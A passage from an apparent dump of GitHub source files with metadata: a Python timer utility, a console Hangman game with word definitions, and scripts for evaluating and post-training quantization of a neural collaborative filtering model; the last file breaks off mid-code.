"avg_line_length": 12.779999732971191,
"blob_id": "14125a0c8c94fbe9babebb2688389ecdb58d9b1b",
"content_id": "54e8030ee5a9a9782f23635968a068e0d6c854e9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 689,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 50,
"path": "/timer_test.py",
"repo_name": "den200x/side_scripts",
"src_encoding": "UTF-8",
"text": "import see as s\nimport time\nimport datetime\n\n\nd = s.timeTool()\nprint('here we go again=====>')\n\nd.datetimeConverter()\ntime.sleep(3)\nd.ProcessingTime()\n\nprint('try again')\n\nd.datetimeConverter()\ntime.sleep(4.5)\nd.ProcessingTime()\n\nprint('Sonic Boooooooooooooooom')\n\nd.datetimeConverter()\ntime.sleep(3)\nd.ProcessingTime()\n\n'''\nprint('here we go=========>')\ny= datetime.datetime.now()\nprint(y)\nd = tdc_timer.timeTool()\ni_T = d.datetimeConverter\ni_T\ntime.sleep(1.5)\nprint('over')\np_T = d.ProcessingTime()\np_T\nprint('new task===========================================>')\n\ny\nprint(y)\ni_T\n\ndef foo():\n count = 0\n while count<5:\n time.sleep(0.2)\n count+=1\n return\n\np_T\n'''\n"
},
{
"alpha_fraction": 0.5445255637168884,
"alphanum_fraction": 0.5620437860488892,
"avg_line_length": 20.4375,
"blob_id": "11194f0208c64b26b7c3501adb68cbd727144b48",
"content_id": "609519c63a9f8582ce6bcdda18021717ca5f686f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 685,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 32,
"path": "/tdc_timer.py",
"repo_name": "den200x/side_scripts",
"src_encoding": "UTF-8",
"text": "import datetime\nimport time\n\ntl=[]\nstartTime = ''\nclass timeTool:\n def runTime(self):\n global startTime\n startTime = datetime.datetime.now()\n return\n\n def datetimeConverter(self):\n global tl\n self.runTime()\n #print(type(startTime))\n startTimestring = str(startTime)\n startTimelist = startTimestring.split()\n tS = list(map(float,startTimelist[1].split(':')))\n csT= tS[0]*3600+tS[1]*60+tS[2]\n tl.append(csT)\n\n #print(tl)\n print(csT)\n return\n\n\n def ProcessingTime(self):\n self.datetimeConverter()\n tdc = tl[1]-tl[0]\n print(tdc)\n del tl[:]\n return"
}
] | 3 |
differentkaro/Hangman-Next | https://github.com/differentkaro/Hangman-Next | 13d0199c4809c069eeba43f3961ab2283fd141b3 | 925ee0df8712dd573adb80424b06e3c2614bc85f | f9976524be7f61e38a2fb4f92b692086771ba125 | refs/heads/master | 2021-06-11T15:28:13.921343 | 2017-02-03T22:22:32 | 2017-02-03T22:22:32 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.642625093460083,
"alphanum_fraction": 0.6429499387741089,
"avg_line_length": 39.5945930480957,
"blob_id": "80ddd83cc47845a45a4053d1b0cc210236392cdf",
"content_id": "ab30066765082fe3c422122df953f3f085c7cbfc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6157,
"license_type": "no_license",
"max_line_length": 167,
"num_lines": 148,
"path": "/words.py",
"repo_name": "differentkaro/Hangman-Next",
"src_encoding": "UTF-8",
"text": "# creating a dictionary function\r\ndef meaning(word):\r\n \r\n # words definition\r\n sevenDef = \"equivalent to the sum of three and four\"\r\n worldDef = \"the earth, together with all of its countries and peoples\"\r\n aboutDef = \"used to indicate movement within a particular area\"\r\n againDef = \"another time; once more\"\r\n heartDef = \"a hollow muscular organ that pumps the blood through the circulatory system\"\r\n pizzaDef = \"a dish of Italian origin, consisting of a flat round base of dough baked with a topping of tomatoes and cheese\"\r\n waterDef = \"a colourless, transparent, odourless, liquid\"\r\n happyDef = \"feeling or showing pleasure or contentment\"\r\n sixtyDef = \"the number equivalent to the product of six and ten\"\r\n boardDef = \"a long, thin, flat piece of wood or other hard material\"\r\n monthDef = \"each of the twelve named periods into which a year is divided\"\r\n angelDef = \"a spiritual being believed to act as an attendant, agent, or messenger of God\"\r\n deathDef = \"the action or fact of being killed\"\r\n greenDef = \"of the colour between blue and yellow in the spectrum\"\r\n musicDef = \"vocal or instrumental sounds combined to produce harmony\"\r\n fiftyDef = \"the number equivalent to the product of five and ten\"\r\n threeDef = \"equivalent to the sum of one and two\"\r\n partyDef = \"a social gathering of invited guests\"\r\n pianoDef = \"a large keyboard musical instrument with a wooden case\"\r\n tigerDef = \"a very large solitary cat with a yellow-brown coat striped with black\"\r\n faithDef = \"complete trust or confidence in someone or something\"\r\n earthDef = \"the planet on which we live\"\r\n riverDef = \"a large natural stream of water flowing in a channel to the sea\"\r\n moneyDef = \"a current medium of exchange\"\r\n peaceDef = \"freedom from disturbance\"\r\n fortyDef = \"the number equivalent to the product of four and ten\"\r\n smileDef = \"a pleased, kind, or amused facial expression\"\r\n abateDef = \"make (something) less intense\"\r\n houseDef = \"a building for human habitation\"\r\n aloneDef = \"having no one else present\"\r\n watchDef = \"look at or observe attentively over a period of time\"\r\n lemonDef = \"a pale yellow oval citrus fruit with thick skin and fragrant\"\r\n southDef = \"the direction towards the point of the horizon 90° clockwise from east\"\r\n ericaDef = \"a plant of the genus family Ericaceae \"\r\n animeDef = \"a style of Japanese film and television animation\"\r\n afterDef = \"in the time following an event or another period of time\"\r\n womanDef = \"an adult human female\"\r\n santaDef = \"legendary patron saint of children, commonly identified with Saint Nicholas\"\r\n stoneDef = \"hard solid non-metallic mineral matter of which rock is made\"\r\n chinaDef = \"a fine white or translucent vitrified ceramic material\"\r\n bloodDef = \"the red liquid that circulates in the arteries and veins of humans and other vertebrate animals\"\r\n mouthDef = \"the opening and cavity in the lower part of the human face\"\r\n sugarDef = \"a sweet crystalline substance obtained from various plants\"\r\n amberDef = \"hard translucent fossilized resin originating from extinct coniferous trees of the Tertiary period\"\r\n dreamDef = \"a series of thoughts, images, and sensations occurring in a person's mind during sleep.\"\r\n appleDef = \"the round fruit of a tree of the rose family, which typically has thin green or red skin and crisp flesh.\"\r\n laughDef = \"make the spontaneous sounds and 
movements of the face and body that are the instinctive expressions of lively amusement and sometimes also of derision\"\r\n error = \"We ran into a problem :( please close this app and try again\"\r\n if word == \"seven\":\r\n return sevenDef\r\n elif word == \"world\":\r\n return worldDef\r\n elif word == \"about\":\r\n return aboutDef\r\n elif word == \"again\":\r\n return againDef\r\n elif word == \"pizza\":\r\n return pizzaDef\r\n elif word == \"heart\":\r\n return heartDef\r\n elif word == \"water\":\r\n return waterDef\r\n elif word == \"happy\":\r\n return happyDef\r\n elif word == \"sixty\":\r\n return sixtyDef\r\n elif word == \"board\":\r\n return boardDef\r\n elif word == \"month\":\r\n return monthDef\r\n elif word == \"angel\":\r\n return angelDef\r\n elif word == \"death\":\r\n return deathDef\r\n elif word == \"green\":\r\n return greenDef\r\n elif word == \"music\":\r\n return musicDef\r\n elif word == \"fifty\":\r\n return fiftyDef\r\n elif word == \"three\":\r\n return threeDef\r\n elif word == \"party\":\r\n return partyDef\r\n elif word == \"piano\":\r\n return pianoDef\r\n elif word == \"mouth\":\r\n return mouthDef\r\n elif word == \"woman\":\r\n return womanDef\r\n elif word == \"sugar\":\r\n return sugarDef\r\n elif word == \"amber\":\r\n return amberDef\r\n elif word == \"dream\":\r\n return dreamDef\r\n elif word == \"apple\":\r\n return appleDef\r\n elif word == \"laugh\":\r\n return laughDef\r\n elif word == \"tiger\":\r\n return tigerDef\r\n elif word == \"faith\":\r\n return faithDef\r\n elif word == \"earth\":\r\n return earthDef\r\n elif word == \"river\":\r\n return riverDef\r\n elif word == \"money\":\r\n return moneyDef\r\n elif word == \"peace\":\r\n return peaceDef\r\n elif word == \"forty\":\r\n return fortyDef\r\n elif word == \"smile\":\r\n return smileDef\r\n elif word == \"abate\":\r\n return abateDef\r\n elif word == \"house\":\r\n return houseDef\r\n elif word == \"alone\":\r\n return aloneDef\r\n elif word == \"watch\":\r\n return watchDef\r\n elif word == \"lemon\":\r\n return lemonDef\r\n elif word == \"south\":\r\n return southDef\r\n elif word == \"erica\":\r\n return ericaDef\r\n elif word == \"anime\":\r\n return animeDef\r\n elif word == \"after\":\r\n return afterDef\r\n elif word == \"santa\":\r\n return santaDef\r\n elif word == \"stone\":\r\n return stoneDef\r\n elif word == \"china\":\r\n return chinaDef\r\n elif word == \"blood\":\r\n return bloodDef\r\n else:\r\n return error\r\n"
},
{
"alpha_fraction": 0.7817460298538208,
"alphanum_fraction": 0.7817460298538208,
"avg_line_length": 49.400001525878906,
"blob_id": "c4828442522e66ba1f05c77353dca64615753d4b",
"content_id": "76c086adb7d5cc1b14536fb229bed7fd9daea164",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 252,
"license_type": "no_license",
"max_line_length": 151,
"num_lines": 5,
"path": "/README.md",
"repo_name": "differentkaro/Hangman-Next",
"src_encoding": "UTF-8",
"text": "### About Hangman Next\nHangman Next is the next level for the classic Hangman game introducing score, levels, live and highscore just like any regular mobile and pc games are\n\n### Contact or Support\nyou can contact the developer KARO via mail: [email protected]\n"
},
{
"alpha_fraction": 0.32270917296409607,
"alphanum_fraction": 0.32706671953201294,
"avg_line_length": 52.27027130126953,
"blob_id": "4e2217cd5c035250a59b3a4b1fc09a2681c54f8f",
"content_id": "e7011b1644f32c8c5c100934cfa2c21b9d502dde",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8796,
"license_type": "no_license",
"max_line_length": 150,
"num_lines": 148,
"path": "/wordsGame.py",
"repo_name": "differentkaro/Hangman-Next",
"src_encoding": "UTF-8",
"text": "import words\r\nimport random\r\n\r\n#declaring variableS\r\nwordsToGuess = [\"seven\", \"world\", \"about\", \"again\", \"heart\", \"pizza\", \"water\", \"happy\", \"sixty\", \"board\",\r\n \"month\", \"angel\", \"death\", \"green\", \"music\", \"fifty\", \"three\", \"party\", \"piano\", \"mouth\", \"woman\", \"sugar\",\r\n \"amber\", \"dream\", \"apple\", \"laugh\", \"tiger\", \"faith\", \"earth\", \"river\", \"money\", \"peace\", \"forty\", \"smile\", \"abate\", \"house\", \"alone\",\r\n \"watch\", \"lemon\", \"south\", \"erica\", \"anime\", \"after\", \"santa\", \"stone\", \"china\", \"blood\"]\r\nscore = 0\r\nlife = 5\r\npicture0 = \"\"\"\r\n =============================================\r\n ░█──░█ ░█▀▀▀█ ░█─░█ ░█──░█ ░█▀▀▀█ ░█▄─░█ █ \r\n ░█▄▄▄█ ░█──░█ ░█─░█ ░█░█░█ ░█──░█ ░█░█░█ ▀ \r\n ──░█── ░█▄▄▄█ ─▀▄▄▀ ░█▄▀▄█ ░█▄▄▄█ ░█──▀█ ▄\r\n =============================================\r\n\"\"\"\r\npicture1 = \"\"\"\r\n +----+ =========================================================\r\n | ┃ ░█▀▀█ ─█▀▀█ ░█▀▄▀█ ░█▀▀▀ ░█▀▀▀█ ░█──░█ ░█▀▀▀ ░█▀▀█ █ \r\n O ┃ ░█─▄▄ ░█▄▄█ ░█░█░█ ░█▀▀▀ ░█──░█ ─░█░█─ ░█▀▀▀ ░█▄▄▀ ▀ \r\n /|\\ ┃ ░█▄▄█ ░█─░█ ░█──░█ ░█▄▄▄ ░█▄▄▄█ ──▀▄▀─ ░█▄▄▄ ░█─░█ ▄ \r\n / \\ ===========================================================\r\n ┃\r\n =========\r\n\"\"\"\r\n\r\n\r\n#main code\r\n\r\nprint(\"\"\"\r\n =======================================================\r\n F.I.V.E L.E.T.T.E.R V1.05\r\n =======================================================\r\n ░█─░█ ─ ─█▀▀█ ─ ░█▄─░█ ─ ░█▀▀█ ─ ░█▀▄▀█ ─ ─█▀▀█ ─ ░█▄─░█ \r\n ░█▀▀█ ▄ ░█▄▄█ ▄ ░█░█░█ ▄ ░█─▄▄ ▄ ░█░█░█ ▄ ░█▄▄█ ▄ ░█░█░█ \r\n ░█─░█ █ ░█─░█ █ ░█──▀█ █ ░█▄▄█ █ ░█──░█ █ ░█─░█ █ ░█──▀█\r\n ========================================================\r\n \"\"\")\r\n#welcome texts\r\nprint(\"welcome to the five letter Hangman guessing game!\")\r\nprint(\"You would be given a defination of a 5 letter word and youll have to guess all 5 possible letters that could be found in the word\")\r\nprint(\"you get one(1) point on correctly getting each letter and get and extra life at the completion of each word\")\r\nprint(\"by default you have 0 score and 5 lives. enter \\\"exit\\\" to exit at any point of the game\")\r\nwith open('score.txt', 'r') as high:\r\n highScore = int(high.read())\r\n print(\"Your High Score is \", highScore)\r\nwhile \"true\": #main game starts here\r\n option = input(\"\\nenter \\\"start\\\" to start or \\\"exit\\\" to exit or \\\"reset\\\" to reset your high score \\n\")\r\n if option.lower() == \"start\":\r\n selectedWord = \"\"\r\n used = [\"\"]\r\n while \"true\":\r\n if len(used) <= 47:\r\n if life < 1:\r\n score = 0\r\n life = 5\r\n break\r\n else:\r\n while selectedWord in used:\r\n selectedWord = random.choice(wordsToGuess)\r\n used.append(selectedWord)\r\n print(\"Guess the possible letters found in the word with the defination:\", words.meaning(selectedWord))\r\n chosen = [\"\"]\r\n blanks = \"_\" * 5\r\n while \"true\":\r\n if life < 1:\r\n print(picture1)\r\n print(\"Game Over! Sorry you have no lifes left. 
The correct answer is\", selectedWord)\r\n if score > highScore:\r\n with open('score.txt', 'r+') as high:\r\n high.write(str(score))\r\n highScore = score\r\n print(\"You Have a new High Score!\")\r\n print(\"your score is \", score)\r\n print(\"play again?\")\r\n break\r\n if len(chosen) >= 6:\r\n break\r\n else:\r\n print(blanks)\r\n answer = input()\r\n answer = answer.lower()\r\n if answer == \"exit\":\r\n print(\"Hangman would now exit...\")\r\n exit()\r\n else:\r\n if len(answer) != 1:\r\n print(\"sorry! try again, please enter one letter only\")\r\n elif answer not in \"abcdefghijklmnopqrstuvwxyz\":\r\n print(\"sorry! try again, please enter a letter\")\r\n else:\r\n if answer in chosen:\r\n print(\"letter has been entered previously, enter a new letter\")\r\n else:\r\n for i in range(5):\r\n if selectedWord[i] in answer:\r\n blanks = blanks[:i] + selectedWord[i] + blanks[i + 1:]\r\n if answer in selectedWord:\r\n score += 1\r\n if len(chosen) >= 5:\r\n if score == 4:\r\n score += 1\r\n life += 1\r\n print(\"Congratulations! you finished this word, your score is\", score,\r\n \" and you now have\", life, \" life! Try out the next word!\")\r\n chosen.append(answer)\r\n else:\r\n if blanks == selectedWord:\r\n score += 1\r\n life += 1\r\n print(\"Congratulations! you finished this word\", selectedWord,\r\n \"your score is\", score, \" and you now have\", life,\r\n \" life! Try out the next word!\")\r\n chosen.append(answer)\r\n chosen.append(answer)\r\n else:\r\n print(\"that is correct!, your score is\", score,\r\n \". now enter another possible letter\")\r\n chosen.append(answer)\r\n else:\r\n life -= 1\r\n if life > 0:\r\n print(\"that is wrong! you have\", life, \" life(s) left. Try again!\")\r\n else:\r\n print(picture0)\r\n if score > highScore:\r\n with open('score.txt', 'r+') as high:\r\n high.write(str(score))\r\n highScore = score\r\n print(\"You Have a new High Score!\")\r\n print(\"your score is \", score)\r\n print(\"Play again?\")\r\n break\r\n \r\n elif option.lower() == \"exit\":\r\n print(\"Hangman would now exit...\")\r\n exit()\r\n elif option.lower() == \"reset\":\r\n with open('score.txt', 'w') as high:\r\n high.write(' ')\r\n with open('score.txt', 'r+') as high:\r\n high.write('0')\r\n with open('score.txt', 'r') as high:\r\n resetHighScore = high.read()\r\n print(\"Your high score has been reset. Your new high score is \", resetHighScore)\r\n else:\r\n print(\"entry not understood, please try again!\")\r\n"
}
] | 3 |
ynahshan/training | https://github.com/ynahshan/training | fff1246462af1327fc71d52eff57c55883c5e0df | abf620bc646a704602207f43b706b0655b2517d4 | db83df76d9f536e005d36cccb4cb64c3e19eb539 | refs/heads/master | 2020-07-31T08:35:44.222042 | 2019-10-02T05:55:07 | 2019-10-02T05:55:07 | 210,546,893 | 0 | 0 | null | 2019-09-24T08:06:32 | 2019-09-23T19:18:26 | 2019-09-19T15:27:57 | null | [
{
"alpha_fraction": 0.6133173704147339,
"alphanum_fraction": 0.6217904686927795,
"avg_line_length": 36.32907485961914,
"blob_id": "4a76eb02a6d9c0d2e3584303bc766f2f8e5b0d01",
"content_id": "7dc1d8004ea68046340dd0d29800b74968c23f66",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11684,
"license_type": "permissive",
"max_line_length": 123,
"num_lines": 313,
"path": "/recommendation/pytorch/layer_scale_optimization.py",
"repo_name": "ynahshan/training",
"src_encoding": "UTF-8",
"text": "import torch\nimport torch.nn as nn\nimport os\nimport sys\nimport numpy as np\nfrom tqdm import tqdm\nimport math\nfrom neumf import NeuMF\nimport random\nimport torch.backends.cudnn as cudnn\nfrom itertools import count\nfrom pathlib import Path\n\nsys.path.insert(0, '/home/cvds_lab/yury/mxt-experiments/nn-quantization-pytorch')\nfrom quantization.quantizer import ModelQuantizer\nfrom quantization.posttraining.module_wrapper import ActivationModuleWrapperPost, ParameterModuleWrapperPost\nfrom quantization.methods.clipped_uniform import FixedClipValueQuantization\nfrom utils.mllog import MLlogger\nimport scipy.optimize as opt\n\n\ndef save_data(data_, fname):\n with open(fname, 'wb') as f:\n pickle.dump(data_, f)\n\ndef load_data(fname):\n with open(fname, 'rb') as f:\n data_ = pickle.load(f)\n return data_\n\n\n\nfrom argparse import ArgumentParser\nimport pickle\n\ndef parse_args():\n parser = ArgumentParser(description=\"Validate a Nerual Collaborative\"\n \" Filtering model\")\n parser.add_argument('--data', type=str,\n help='path to test data files')\n parser.add_argument('--no-cuda', action='store_true',\n help='use available GPUs')\n parser.add_argument('--seed', '-s', type=int, default=0,\n help='manually set random seed for torch')\n parser.add_argument('--load_ckp', type=str, default=None,\n help='Path to load checkpoint from.')\n\n parser.add_argument('--quantize', '-q', action='store_true', help='Enable quantization', default=False)\n parser.add_argument('--experiment', '-exp', help='Name of the experiment', default='default')\n parser.add_argument('--bit_weights', '-bw', type=int, help='Number of bits for weights', default=None)\n parser.add_argument('--bit_act', '-ba', type=int, help='Number of bits for activations', default=None)\n parser.add_argument('--pre_relu', dest='pre_relu', action='store_true', help='use pre-ReLU quantization')\n parser.add_argument('--qtype', default='max_static', help='Type of quantization method')\n parser.add_argument('-lp', type=float, help='p parameter of Lp norm', default=3.)\n\n parser.add_argument('--min_method', '-mm', help='Minimization method to use [Nelder-Mead, Powell, COBYLA]',\n default='Powell')\n parser.add_argument('--maxiter', '-maxi', type=int, help='Maximum number of iterations to minimize algo',\n default=None)\n parser.add_argument('--maxfev', '-maxf', type=int, help='Maximum number of function evaluations of minimize algo',\n default=None)\n\n parser.add_argument('--init_method', default='static',\n help='Scale initialization method [static, dynamic, random], default=static')\n parser.add_argument('-siv', type=float, help='Value for static initialization', default=1.)\n\n parser.add_argument('--dont_fix_np_seed', '-dfns', action='store_true',\n help='Do not fix np seed even if seed specified')\n\n return parser.parse_args()\n\n\ndef data_loader(path):\n # load data:\n print('Data loading ...')\n data_ = load_data(path)\n test_users = []\n test_items = []\n dup_mask = []\n real_indices = []\n for i in tqdm(range(len(data_['test_users']))):\n test_users.append(torch.tensor(data_['test_users'][i]))\n test_items.append(torch.tensor(data_['test_items'][i]))\n dup_mask.append(torch.tensor(data_['dup_mask'][i]))\n real_indices.append(torch.tensor(data_['real_indices'][i]))\n\n K = data_['K']\n samples_per_user = data_['samples_per_user']\n num_user = data_['num_user']\n\n return test_users, test_items, dup_mask, real_indices, K, samples_per_user, num_user\n\n\nclass NcfData(object):\n def __init__(self, test_users, 
test_items, dup_mask, real_indices, K, samples_per_user, num_user):\n self.test_users = test_users\n self.test_items = test_items\n self.dup_mask = dup_mask\n self.real_indices = real_indices\n self.K = K\n self.samples_per_user = samples_per_user\n self.num_user = num_user\n\n def get_subset(self, N):\n return NcfData(self.test_users[:N], self.test_items[:N], self.dup_mask[:N], self.real_indices[:N], self.K,\n self.samples_per_user, self.num_user)\n\n def remove_last(self, N):\n return NcfData(self.test_users[N:], self.test_items[N:], self.dup_mask[N:], self.real_indices[N:], self.K,\n self.samples_per_user, self.num_user)\n\n\nclass CalibrationSet(object):\n def __init__(self, f_path):\n data_ = torch.load(f_path)\n self.users = data_['users']\n self.items = data_['items']\n self.labels = data_['labels']\n\n def cuda(self):\n self.users = self.users.cuda()\n self.items = self.items.cuda()\n self.labels = self.labels.cuda()\n return self\n\n def split(self, batch_size):\n self.users = self.users.split(batch_size)\n self.items = self.items.split(batch_size)\n self.labels = self.labels.split(batch_size)\n\n\ndef set_clipping(mq, clipping, device, verbose=False):\n qwrappers = mq.get_qwrappers()\n for i, qwrapper in enumerate(qwrappers):\n qwrapper.set_quantization(FixedClipValueQuantization,\n {'clip_value': clipping[i], 'device': device}, verbose=verbose)\n\n\ndef get_clipping(mq):\n clipping = []\n qwrappers = mq.get_qwrappers()\n for i, qwrapper in enumerate(qwrappers):\n q = qwrapper.get_quantization()\n clip_value = getattr(q, 'alpha')\n clipping.append(clip_value)\n\n return np.array(clipping)\n\n\ndef val(model, data):\n print('Validation ...')\n log_2 = math.log(2)\n\n model.eval()\n hits = torch.tensor(0., device='cuda')\n ndcg = torch.tensor(0., device='cuda')\n\n with torch.no_grad():\n list_ = list(enumerate(zip(data.test_users, data.test_items)))\n for i, (u,n) in tqdm(list_):\n res = model(u.cuda().view(-1), n.cuda().view(-1), sigmoid=True).detach().view(-1, data.samples_per_user)\n # set duplicate results for the same item to -1 before topk\n res[data.dup_mask[i]] = -1\n out = torch.topk(res, data.K)[1]\n # topk in pytorch is stable(if not sort)\n # key(item):value(predicetion) pairs are ordered as original key(item) order\n # so we need the first position of real item(stored in real_indices) to check if it is in topk\n ifzero = (out == data.real_indices[i].cuda().view(-1,1))\n hits_ = ifzero.sum()\n ndcg_ = (log_2 / (torch.nonzero(ifzero)[:, 1].view(-1).to(torch.float)+2).log_()).sum()\n hits += hits_\n ndcg += ndcg_\n\n hits = hits.item()\n ndcg = ndcg.item()\n\n return hits / data.num_user, ndcg / data.num_user\n\n\ndef evaluate_calibration(model, cal_data, criterion):\n total_loss = torch.tensor([0.]).cuda()\n for i in range(len(cal_data.users)):\n outputs = model(cal_data.users[i].view(-1), cal_data.items[i].view(-1), sigmoid=True)\n loss = criterion(outputs.view(-1), cal_data.labels[i])\n total_loss += loss\n\n loss = total_loss.item() / len(cal_data.users)\n return loss\n\n\ndef validate(model, data):\n hr, ndcg = val(model, data)\n print('')\n print('')\n print('HR@{K} = {hit_rate:.4f}, NDCG@{K} = {ndcg:.4f}'\n .format(K=data.K, hit_rate=hr, ndcg=ndcg))\n return hr, ndcg\n\n\n_eval_count = count(0)\n_min_loss = 1e6\ndef run_inference_on_calibration(scales, model, mq, cal_data, criterion):\n global _eval_count, _min_loss\n eval_count = next(_eval_count)\n\n set_clipping(mq, scales, model.device, verbose=(eval_count % 300 == 0))\n loss = evaluate_calibration(model, 
cal_data, criterion)\n\n if loss < _min_loss:\n _min_loss = loss\n\n print_freq = 20\n if eval_count % 20 == 0:\n print(\"func eval iteration: {}, minimum loss of last {} iterations: {:.4f}\".format(\n eval_count, print_freq, _min_loss))\n\n return loss\n\n\ndef main(args, ml_logger):\n # Fix the seed\n random.seed(args.seed)\n if not args.dont_fix_np_seed:\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n torch.cuda.manual_seed_all(args.seed)\n cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n # Check that GPUs are actually available\n use_cuda = not args.no_cuda and torch.cuda.is_available()\n\n # Create model\n model = NeuMF(2197225, 855776,\n mf_dim=64, mf_reg=0.,\n mlp_layer_sizes=[256, 256, 128, 64],\n mlp_layer_regs=[0. for i in [256, 256, 128, 64]])\n\n print(model)\n\n if use_cuda:\n # Move model and loss to GPU\n model = model.cuda()\n model.device = torch.device('cuda:{}'.format(0))\n\n if args.load_ckp:\n ckp = torch.load(args.load_ckp)\n model.load_state_dict(ckp)\n\n all_embeding = [n for n, m in model.named_modules() if isinstance(m, nn.Embedding)]\n all_linear = [n for n, m in model.named_modules() if isinstance(m, nn.Linear)]\n all_relu = [n for n, m in model.named_modules() if isinstance(m, nn.ReLU)]\n all_relu6 = [n for n, m in model.named_modules() if isinstance(m, nn.ReLU6)]\n layers = all_relu + all_relu6 + all_linear + all_embeding\n replacement_factory = {nn.ReLU: ActivationModuleWrapperPost,\n nn.ReLU6: ActivationModuleWrapperPost,\n nn.Linear: ParameterModuleWrapperPost,\n nn.Embedding: ActivationModuleWrapperPost}\n mq = ModelQuantizer(model, args, layers, replacement_factory)\n # mq.log_quantizer_state(ml_logger, -1)\n\n test_users, test_items, dup_mask, real_indices, K, samples_per_user, num_user = data_loader(args.data)\n data = NcfData(test_users, test_items, dup_mask, real_indices, K, samples_per_user, num_user)\n cal_data = CalibrationSet('ml-20mx16x32/cal_set').cuda()\n cal_data.split(batch_size=10000)\n\n criterion = nn.BCEWithLogitsLoss(reduction='mean')\n criterion = criterion.cuda()\n\n print(\"init_method: {}, qtype {}\".format(args.init_method, args.qtype))\n # evaluate to initialize dynamic clipping\n loss = evaluate_calibration(model, cal_data, criterion)\n print(\"Initial loss: {:.4f}\".format(loss))\n\n # get clipping values\n init = get_clipping(mq)\n\n # evaluate\n hr, ndcg = validate(model, data)\n ml_logger.log_metric('HR init', hr, step='auto')\n\n # run optimizer\n min_options = {}\n if args.maxiter is not None:\n min_options['maxiter'] = args.maxiter\n if args.maxfev is not None:\n min_options['maxfev'] = args.maxfev\n\n _iter = count(0)\n\n def local_search_callback(x):\n it = next(_iter)\n loss = run_inference_on_calibration(x, model, mq, cal_data, criterion)\n print(\"\\n[{}]: Local search callback\".format(it))\n print(\"loss: {:.4f}\\n\".format(loss))\n\n res = opt.minimize(lambda scales: run_inference_on_calibration(scales, model, mq, cal_data, criterion), np.array(init),\n method=args.min_method, options=min_options, callback=local_search_callback)\n\n print(res)\n scales = res.x\n set_clipping(mq, scales, model.device)\n # evaluate\n hr, ndcg = validate(model, data)\n ml_logger.log_metric('HR Powell', hr, step='auto')\n # save scales\n\nhome = str(Path.home())\nif __name__ == '__main__':\n args = parse_args()\n with MLlogger(os.path.join(home, 'mxt-sim/mllog_runs'), args.experiment, args,\n name_args=['NCF', '1B', \"W{}A{}\".format(args.bit_weights, args.bit_act)]) as ml_logger:\n main(args, 
ml_logger)\n"
},
{
"alpha_fraction": 0.5963220000267029,
"alphanum_fraction": 0.605818510055542,
"avg_line_length": 36.908573150634766,
"blob_id": "05eeb113f163722bb45410ed991ddbb186f9ad88",
"content_id": "12ffaff6ce5f9b4a0111bf072b38812a718577a7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6634,
"license_type": "permissive",
"max_line_length": 116,
"num_lines": 175,
"path": "/recommendation/pytorch/eval_ncf.py",
"repo_name": "ynahshan/training",
"src_encoding": "UTF-8",
"text": "import torch\nimport torch.nn as nn\nimport os\nimport sys\nimport numpy as np\nfrom tqdm import tqdm\nimport math\nfrom neumf import NeuMF\nimport pickle\n\nsys.path.append('/home/cvds_lab/yury/mxt-experiments/nn-quantization-pytorch')\nfrom quantization.quantizer import ModelQuantizer\nfrom quantization.posttraining.module_wrapper import ActivationModuleWrapperPost, ParameterModuleWrapperPost\n\n\ndef save_data(data_, fname):\n with open(fname, 'wb') as f:\n pickle.dump(data_, f)\n\ndef load_data(fname):\n with open(fname, 'rb') as f:\n data_ = pickle.load(f)\n return data_\n\n\n\nfrom argparse import ArgumentParser\nimport pickle\n\ndef parse_args():\n parser = ArgumentParser(description=\"Validate a Nerual Collaborative\"\n \" Filtering model\")\n parser.add_argument('--data', type=str,\n help='path to test data files')\n parser.add_argument('--no-cuda', action='store_true',\n help='use available GPUs')\n parser.add_argument('--seed', '-s', type=int,\n help='manually set random seed for torch')\n parser.add_argument('--load_ckp', type=str, default=None,\n help='Path to load checkpoint from.')\n\n parser.add_argument('--quantize', '-q', action='store_true', help='Enable quantization', default=False)\n parser.add_argument('--experiment', '-exp', help='Name of the experiment', default='default')\n parser.add_argument('--bit_weights', '-bw', type=int, help='Number of bits for weights', default=None)\n parser.add_argument('--bit_act', '-ba', type=int, help='Number of bits for activations', default=None)\n parser.add_argument('--pre_relu', dest='pre_relu', action='store_true', help='use pre-ReLU quantization')\n parser.add_argument('--qtype', default='max_static', help='Type of quantization method')\n parser.add_argument('-lp', type=float, help='p parameter of Lp norm', default=3.)\n\n return parser.parse_args()\n\n\ndef data_loader(path):\n # load data:\n print('Data loading ...')\n data_ = load_data(path)\n test_users = []\n test_items = []\n dup_mask = []\n real_indices = []\n for i in tqdm(range(len(data_['test_users']))):\n test_users.append(torch.tensor(data_['test_users'][i]))\n test_items.append(torch.tensor(data_['test_items'][i]))\n dup_mask.append(torch.tensor(data_['dup_mask'][i]))\n real_indices.append(torch.tensor(data_['real_indices'][i]))\n\n K = data_['K']\n samples_per_user = data_['samples_per_user']\n num_user = data_['num_user']\n\n return test_users, test_items, dup_mask, real_indices, K, samples_per_user, num_user\n\n\nclass NcfData(object):\n def __init__(self, test_users, test_items, dup_mask, real_indices, K, samples_per_user, num_user):\n self.test_users = test_users\n self.test_items = test_items\n self.dup_mask = dup_mask\n self.real_indices = real_indices\n self.K = K\n self.samples_per_user = samples_per_user\n self.num_user = num_user\n\n def get_subset(self, N):\n return NcfData(self.test_users[:N], self.test_items[:N], self.dup_mask[:N], self.real_indices[:N], self.K,\n self.samples_per_user, self.num_user)\n\n def remove_last(self, N):\n return NcfData(self.test_users[N:], self.test_items[N:], self.dup_mask[N:], self.real_indices[N:], self.K,\n self.samples_per_user, self.num_user)\n\n\ndef val(model, data):\n print('Validation ...')\n log_2 = math.log(2)\n\n model.eval()\n hits = torch.tensor(0., device='cuda')\n ndcg = torch.tensor(0., 